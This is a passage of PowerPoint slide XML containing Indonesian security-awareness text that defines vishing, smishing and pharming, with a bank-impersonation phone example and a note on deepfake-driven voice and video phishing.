            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Vishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VoIP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditelepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru-baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> detail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>SMiShing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SMS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektornya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjebak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> korban.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pesat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> pharming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, pharming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> korban </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resolusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
